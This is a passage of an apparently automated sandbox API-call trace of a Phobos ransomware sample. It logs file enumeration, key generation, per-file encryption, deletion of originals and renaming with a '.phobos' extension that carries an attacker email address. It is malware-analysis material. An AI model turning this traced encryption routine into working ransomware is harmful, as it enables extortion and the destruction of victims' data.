dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.512] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.512] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.513] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=70720) returned 1 [0112.513] CloseHandle (hObject=0x2a0) returned 1 [0112.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui")) returned 0x20 [0112.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.513] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.513] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.513] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.513] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=70224) returned 1 [0112.513] CloseHandle (hObject=0x2a0) returned 1 [0112.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui")) returned 0x20 [0112.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.513] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.514] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.514] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.514] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=70208) returned 1 [0112.514] CloseHandle (hObject=0x2a0) returned 1 [0112.514] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui")) returned 0x20 [0112.514] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.514] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.514] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.514] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.514] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=383786) returned 1 [0112.514] CloseHandle (hObject=0x2a0) returned 1 [0112.514] GetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr")) returned 0x27 [0112.514] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x26) returned 0 [0112.515] GetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\bootmgr.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.515] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.515] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x27) returned 0 [0112.515] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.515] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.515] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.515] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.515] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.515] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.515] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=479) returned 1 [0112.515] CloseHandle (hObject=0x2a0) returned 1 [0112.515] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata")) returned 0x2020 [0112.516] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.516] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.516] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.516] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.525] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=251904) returned 1 [0112.525] CloseHandle (hObject=0x2a0) returned 1 [0112.525] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp")) returned 0x20 [0112.525] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.525] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.525] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc78 | out: lpNewFilePointer=0x0) returned 1 [0112.525] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc78 | out: lpNewFilePointer=0x0) returned 1 [0112.525] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0112.526] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fc8c | out: phKey=0x3b6fc8c*=0x29c1a0) returned 1 [0112.526] CryptSetKeyParam (hKey=0x29c1a0, dwParam=0x1, pbData=0x3b6fd38, dwFlags=0x0) returned 1 [0112.526] ReadFile (in: hFile=0x2a0, lpBuffer=0x4190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3b6fcb4, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesRead=0x3b6fcb4*=0x3d800, lpOverlapped=0x0) returned 1 [0112.658] CryptEncrypt (in: hKey=0x29c1a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x3d810, dwBufLen=0x3d810 | out: pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x3d810) returned 1 [0112.660] WriteFile (in: hFile=0x2b8, lpBuffer=0x4190020*, nNumberOfBytesToWrite=0x3d810, lpNumberOfBytesWritten=0x3b6fc98, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesWritten=0x3b6fc98*=0x3d810, lpOverlapped=0x0) returned 1 [0112.665] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc24, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fc90 | out: phKey=0x3b6fc90*=0x29c320) returned 1 [0112.665] CryptSetKeyParam (hKey=0x29c320, dwParam=0x1, pbData=0x3b6fd38, dwFlags=0x0) returned 1 [0112.665] CryptEncrypt (in: hKey=0x29c320, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x50, dwBufLen=0x50 | out: pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x50) returned 1 [0112.665] CryptDestroyKey (hKey=0x29c320) returned 1 [0112.665] WriteFile (in: hFile=0x2b8, lpBuffer=0x4190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x3b6fc98, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesWritten=0x3b6fc98*=0x102, lpOverlapped=0x0) returned 1 [0112.665] CryptDestroyKey (hKey=0x29c1a0) returned 1 [0112.665] CloseHandle (hObject=0x2a0) returned 1 [0112.665] CloseHandle (hObject=0x2b8) returned 1 [0112.825] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp")) returned 1 [0112.827] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.827] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0112.827] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=17420288) returned 1 [0112.827] CloseHandle (hObject=0x2b8) returned 1 [0112.827] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp")) returned 0x20 [0112.827] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0113.259] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0113.260] SetFilePointerEx (in: hFile=0x2b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc48 | out: lpNewFilePointer=0x0) returned 1 [0113.260] SetFilePointerEx (in: hFile=0x2b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc48 | out: lpNewFilePointer=0x0) returned 1 [0113.260] ReadFile (in: hFile=0x2b8, lpBuffer=0x4190058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b6fc54, lpOverlapped=0x0 | out: lpBuffer=0x4190058*, lpNumberOfBytesRead=0x3b6fc54*=0x40000, lpOverlapped=0x0) returned 1 [0113.353] SetFilePointerEx (in: hFile=0x2b8, liDistanceToMove=0x589aaa, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc48 | out: lpNewFilePointer=0x0) returned 1 [0113.353] ReadFile (in: hFile=0x2b8, lpBuffer=0x41d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b6fc54, lpOverlapped=0x0 | out: lpBuffer=0x41d0058*, lpNumberOfBytesRead=0x3b6fc54*=0x40000, lpOverlapped=0x0) returned 1 [0115.072] SetFilePointerEx (in: hFile=0x2b8, liDistanceToMove=0x105d000, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc48 | out: lpNewFilePointer=0x0) returned 1 [0115.072] ReadFile (in: hFile=0x2b8, lpBuffer=0x4210058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b6fc54, lpOverlapped=0x0 | out: lpBuffer=0x4210058*, lpNumberOfBytesRead=0x3b6fc54*=0x40000, lpOverlapped=0x0) returned 1 [0115.274] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc38, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fca4 | out: phKey=0x3b6fca4*=0x29c220) returned 1 [0115.274] CryptSetKeyParam (hKey=0x29c220, dwParam=0x1, pbData=0x3b6fd38, dwFlags=0x0) returned 1 [0115.387] CryptEncrypt (in: hKey=0x29c220, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4190020*, pdwDataLen=0x3b6fc58*=0xc0070, dwBufLen=0xc0070 | out: pbData=0x4190020*, pdwDataLen=0x3b6fc58*=0xc0070) returned 1 [0115.414] CryptDestroyKey (hKey=0x29c220) returned 1 [0115.414] SetFilePointerEx (in: hFile=0x2b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc80 | out: lpNewFilePointer=0x0) returned 1 [0115.414] WriteFile (in: hFile=0x2b8, lpBuffer=0x4190020*, nNumberOfBytesToWrite=0xc0122, lpNumberOfBytesWritten=0x3b6fc90, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesWritten=0x3b6fc90*=0xc0122, lpOverlapped=0x0) returned 1 [0115.442] SetEndOfFile (hFile=0x2b8) returned 1 [0115.442] SetFilePointerEx (in: hFile=0x2b8, liDistanceToMove=0x105d000, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc50 | out: lpNewFilePointer=0x0) returned 1 [0115.442] WriteFile (in: hFile=0x2b8, lpBuffer=0x425015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b6fc5c, lpOverlapped=0x0 | out: lpBuffer=0x425015a*, lpNumberOfBytesWritten=0x3b6fc5c*=0x40000, lpOverlapped=0x0) returned 1 [0115.454] SetFilePointerEx (in: hFile=0x2b8, liDistanceToMove=0x589aaa, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc50 | out: lpNewFilePointer=0x0) returned 1 [0115.455] WriteFile (in: hFile=0x2b8, lpBuffer=0x425015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b6fc5c, lpOverlapped=0x0 | out: lpBuffer=0x425015a*, lpNumberOfBytesWritten=0x3b6fc5c*=0x40000, lpOverlapped=0x0) returned 1 [0115.455] SetFilePointerEx (in: hFile=0x2b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc50 | out: lpNewFilePointer=0x0) returned 1 [0115.455] WriteFile (in: hFile=0x2b8, lpBuffer=0x425015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b6fc5c, lpOverlapped=0x0 | out: lpBuffer=0x425015a*, lpNumberOfBytesWritten=0x3b6fc5c*=0x40000, lpOverlapped=0x0) returned 1 [0115.456] CloseHandle (hObject=0x2b8) returned 1 [0122.311] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.311] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0122.449] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=348974) returned 1 [0122.449] CloseHandle (hObject=0x32c) returned 1 [0122.449] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico")) returned 0x2020 [0122.450] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.450] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.450] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.450] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0122.451] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=25214) returned 1 [0122.451] CloseHandle (hObject=0x32c) returned 1 [0122.451] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico")) returned 0x2020 [0122.452] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.452] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.452] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.452] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.563] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=25214) returned 1 [0122.563] CloseHandle (hObject=0x33c) returned 1 [0122.563] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico")) returned 0x2020 [0122.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.564] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.564] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.564] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.564] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=94048) returned 1 [0122.564] CloseHandle (hObject=0x33c) returned 1 [0122.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll")) returned 0x2020 [0122.565] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.565] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.565] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.565] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.565] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=2827616) returned 1 [0122.565] CloseHandle (hObject=0x33c) returned 1 [0122.565] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll")) returned 0x2020 [0122.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: 